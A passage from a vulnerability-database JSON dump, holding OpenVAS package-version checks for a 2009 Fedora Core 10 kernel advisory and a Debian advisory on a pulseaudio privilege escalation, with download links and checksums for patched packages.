rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-devel\", rpm:\"kernel-PAEdebug-devel~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-debuginfo\", rpm:\"kernel-PAE-debuginfo~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-debuginfo\", rpm:\"kernel-PAEdebug-debuginfo~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-bootwrapper\", rpm:\"kernel-bootwrapper~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-devel\", rpm:\"kernel-smp-devel~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-debuginfo\", rpm:\"kernel-smp-debuginfo~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:40", "description": "The remote host is missing an update to the kernel\nannounced via advisory FEDORA-2009-13098.", "cvss3": {}, "published": "2009-12-14T00:00:00", "type": "openvas", "title": "Fedora Core 10 FEDORA-2009-13098 (kernel)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1895", "CVE-2009-2692", "CVE-2009-3621", "CVE-2009-3638", "CVE-2009-4005", "CVE-2008-5079", "CVE-2009-3080", "CVE-2009-3547", "CVE-2009-3290", "CVE-2009-0065", "CVE-2009-3620", "CVE-2009-2407", "CVE-2009-2406", "CVE-2009-2908", "CVE-2009-2903", "CVE-2009-1897", "CVE-2009-4031", "CVE-2009-3612", "CVE-2009-2847"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:66509", "href": "http://plugins.openvas.org/nasl.php?oid=66509", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_13098.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-13098 (kernel)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nUpdate to kernel 2.6.27.41:\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.39\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.40\nhttp://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.27.41\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update kernel' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-13098\";\ntag_summary = \"The remote host is missing an update to the kernel\nannounced via advisory FEDORA-2009-13098.\";\n\n\n\nif(description)\n{\n script_id(66509);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-14 23:06:43 +0100 (Mon, 14 Dec 2009)\");\n script_cve_id(\"CVE-2009-4031\", \"CVE-2009-3547\", \"CVE-2009-3638\", \"CVE-2009-3621\", \"CVE-2009-3620\", \"CVE-2009-3612\", \"CVE-2009-2908\", \"CVE-2009-2903\", \"CVE-2009-3290\", \"CVE-2009-2847\", \"CVE-2009-2692\", \"CVE-2009-2406\", \"CVE-2009-2407\", \"CVE-2009-1895\", \"CVE-2009-1897\", \"CVE-2009-0065\", \"CVE-2008-5079\", \"CVE-2009-3080\", \"CVE-2009-4005\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 10 FEDORA-2009-13098 (kernel)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=539414\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=539435\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=541160\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo-common\", rpm:\"kernel-debuginfo-common~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug\", rpm:\"kernel-PAEdebug~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n 
report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-devel\", rpm:\"kernel-PAEdebug-devel~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-debuginfo\", rpm:\"kernel-PAE-debuginfo~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAEdebug-debuginfo\", rpm:\"kernel-PAEdebug-debuginfo~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-firmware\", rpm:\"kernel-firmware~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-bootwrapper\", rpm:\"kernel-bootwrapper~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-devel\", rpm:\"kernel-smp-devel~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-debuginfo\", rpm:\"kernel-smp-debuginfo~2.6.27.41~170.2.117.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2023-05-02T17:16:28", "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1838-1 security@debian.org\nhttp://www.debian.org/security/ Florian Weimer\nJuly 18, 2009 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : pulseaudio\nVulnerability : privilege escalation\nProblem type : local\nDebian-specific: no\nCVE Id(s) : CVE-2009-1894\nDebian Bug : 537351\n\nTavis Ormandy and Julien Tinnes discovered that the pulseaudio daemon\ndoes not drop privileges before re-executing itself, enabling local\nattackers to increase their privileges.\n\nThe old stable distribution (etch) is not affected by this issue.\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 0.9.10-3+lenny1.\n\nFor the unstable distribution (sid), this problem will be fixed soon.\n\nWe recommend that you upgrade your pulseaudio packages.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 5.0 alias lenny\n- --------------------------------\n\n
http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-mainloop-glib0-dbg_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 98690 7539ef5197b170adc2c0f4f3095dac39\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-esound-compat_0.9.10-3+lenny1_mips.deb\n Size/MD5 checksum: 78674 6f0f69a9a5a34345f1250210180d6477\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-dev_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 377926 0b4d6084d5c7d6a8f4d2a606a80e90d9\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-gconf_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 65362 dc52cb4b9ecbf55cd4b048e09edeaa36\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-utils_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 203634 d46252e0277a17e23ed1c374e7d0b40e\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-browse0-dbg_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 101244 4704ccf4dae60837fa5cd056b19cd915\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-gconf-dbg_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 70098 9fb0261e0c0e0056aa88bc7fd0b481b4\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-browse0_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 77306 1dc0b5b94030b7a688bda80eaf133c72\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-lirc-dbg_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 65732 3669846ce9a835c61658623028a212da\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulsecore5-dbg_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 403870 973aa32fa72e821b23fffe46084b5d4a\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-dbg_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 686228 bbf54598d5b8f07ba19a3ebb7e87325f\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulsecore5_0.9.10-3+lenny1_powerpc.deb\n 
Size/MD5 checksum: 251140 47533654191322fac29641b0d19b8698\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse0_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 194882 460f8cf77083e917a3096fa65c8552a7\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse0-dbg_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 339512 47cb0c635f75c5420ebf2e9e803f8b4d\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-mainloop-glib0-dbg_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 98870 a485175a5086242ac0adfb7997d4740d\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-esound-compat_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 87304 8c82e2255583ef17b506d36096611f8f\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-zeroconf-dbg_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 92304 32d2a875ac15bbeb006a965b459f4cf1\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-lirc_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 60610 3e025417fd8fcfd9ec9acfc8cdff1ac9\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-mainloop-glib0_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 77312 8fbbaa0f91f6a2780cd9216084608d59\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-hal-dbg_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 82426 038251aa3bf89f11303c5c123a4cf726\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-hal_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 70378 ea5725f405ee39e985a61865a27854de\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-utils-dbg_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 283046 14cc07f105861c25b5bf221c86b62d91\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-x11_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 75070 8fdd7192b94ed7e299cecc9b0f92e1ed\n 
http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-esound-compat-dbg_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 102824 b977fb28f919d9911d940a74002ba28a\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-x11-dbg_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 98982 385739f4ca999e125bb42d1dac974a72\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-jack-dbg_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 82984 ed99d756b799ba6b07e5276658cc78b0\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-jack_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 68070 dfbe4aea1b2e9408a5f295ff8f4b6a3a\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-zeroconf_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 73856 56d0b369ea00d29bdfd9bb83c0257f9d\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio_0.9.10-3+lenny1_powerpc.deb\n Size/MD5 checksum: 439454 b31c7cafbfcd4c83dddd48785a7754e9\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-browse0-dbg_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 100548 0214fc442482b5c7090ceb79f5c27090\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-browse0_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 78522 8261d3e83421e938dc6890010a9d70e0\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse0_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 208544 14fecf1a7fcc580afbdeab1f8b73f324\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-esound-compat-dbg_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 99258 65d1c2cd1f3b0428ea380c50d1bd21ce\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-zeroconf-dbg_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 87860 0a6f5a602dbcf5b0a9aa08276bfde951\n 
http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-gconf_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 61986 4dcaf2c6e2ccffa2759e83320f32d835\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 371424 da91f945dea21175c7fef71027ce2da3\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse0-dbg_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 341270 2e06708dc7a2613538e8d9b77b6fc4f6\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-hal-dbg_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 79084 cbd78997b63ef376ee06e0178d73bc8e\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-utils_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 190560 caf484ec5151295273f93fcee9b3a4b1\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-hal_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 67958 cf6178674b57b0401c2cfb5ae72f09ab\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-dbg_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 620812 2d6ce88c0adf540f176a3d5245399b9b\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-jack_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 65930 7dd7becdeae80cf1026b7a493384f90f\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-gconf-dbg_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 67810 f995fc059e29a3570e10c2c13b4b0bc9\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulsecore5-dbg_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 415728 a3581bc853eeb0e0b61fb27a20012045\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-zeroconf_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 70058 72b7126c044b80e87c66eb8a7ea416bc\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-lirc_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 58546 9f267ca42e705a4c67794170141d04f7\n 
http://security.debian.org/pool/updates/main/p/pulseaudio/libpulsecore5_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 265622 91881d612e8901e35b3eaec011f33b96\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-jack-dbg_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 75462 c97b5ed23b8f780b48a8bc98abe5b1f6\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-dev_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 343574 a1cd00f9270d94b950919db89a30a62c\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-utils-dbg_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 273492 79a540bbca1d60f49499c9544206ace6\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-x11_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 68904 e5eb7d9ab4a2ec85a1122132c3c100aa\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-esound-compat_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 81674 c7163db17dd230855cf1a46383f34264\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-lirc-dbg_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 64466 934307a2947170203947227b354ad18b\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-mainloop-glib0-dbg_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 98328 758922dfd82920ca20186820e19ae512\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-mainloop-glib0_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 78962 f9ec3beb93a7068118530ed33272d174\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-x11-dbg_0.9.10-3+lenny1_s390.deb\n Size/MD5 checksum: 91544 6673126a6365b553ce05c8eb6b16e745\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-gconf-dbg_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 66662 45d9e412cf170071c64289e1a92a6b09\n 
http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-lirc-dbg_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 63560 8ea5f8d300fad52cf57bc093bc938a8a\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulsecore5_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 242524 0c84b827fc920dc16f130f0015145708\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-mainloop-glib0_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 75078 db616b6a59b36438bcd5afc7347f1e96\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-browse0_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 75304 3f020ccb8aea47c0a27e955b5d86a900\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-jack-dbg_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 74232 b19af2e3e228167a6f2f1cce443ee59a\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-x11-dbg_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 93702 46d917e58daacc5260b911be29d55c46\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 353434 c7ee1906b4ca8d317b3c7188b7e93458\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-hal_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 65790 bb598f0efa599c5f41c2b4e48882052a\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-zeroconf-dbg_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 86014 d8ed73c0885f744fdbb5b8204ee5a088\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-hal-dbg_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 77468 c129ad3556417f4d80d6628b62ab904f\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-lirc_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 57622 ff9552b5a136ba5ecb50e2e438a0acd0\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-browse0-dbg_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 97486 
7ef20c0cbad0de3f971839f5f3cc0399\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulsecore5-dbg_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 391866 aaa17f0fcfa72656840f5bea493aff1a\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-jack_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 64034 5248974c7b2bd5d1353741ceb4eb6392\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-dev_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 351832 ee16cc3391e7819f299e71d0013903b2\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-esound-compat-dbg_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 101580 24faa396862fcc9b4c29b530382184fd\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-utils-dbg_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 261054 f351146c55677ec3f16a728d254c56f0\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-zeroconf_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 67958 0dd121a16e0eec31c07cba4832fe845d\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-x11_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 67122 cab4efcc68c29ed251c818fd590a1e61\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-esound-compat_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 79168 33d184042be0a8133cad9b244b88dc4f\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse-mainloop-glib0-dbg_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 93242 b42621e1fda017e93045ed4efd87b56f\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-utils_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 174586 e1aaa6e1a9b6aa1af1dcb0c8b414a10d\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-module-gconf_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 60278 bc1218b7eca8891a367f7c880cf5022f\n http://security.debian.org/pool/updates/main/p/pulseaudio/pulseaudio-dbg_0.9.10-3+lenny1_sparc.deb\n 
Size/MD5 checksum: 617574 fd0bedd20efa06edde82525e9e2330b1\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse0-dbg_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 331682 552d2a40027cde0d1a9cc8360fad0ace\n http://security.debian.org/pool/updates/main/p/pulseaudio/libpulse0_0.9.10-3+lenny1_sparc.deb\n Size/MD5 checksum: 190684 e71731d57b84a892f0683e5b52f7557b\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>", "cvss3": {}, "published": "2009-07-18T12:18:19", "type": "debian", "title": "[SECURITY] [DSA 1838-1] New pulseaudio packages fix privilege escalation", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1894"], 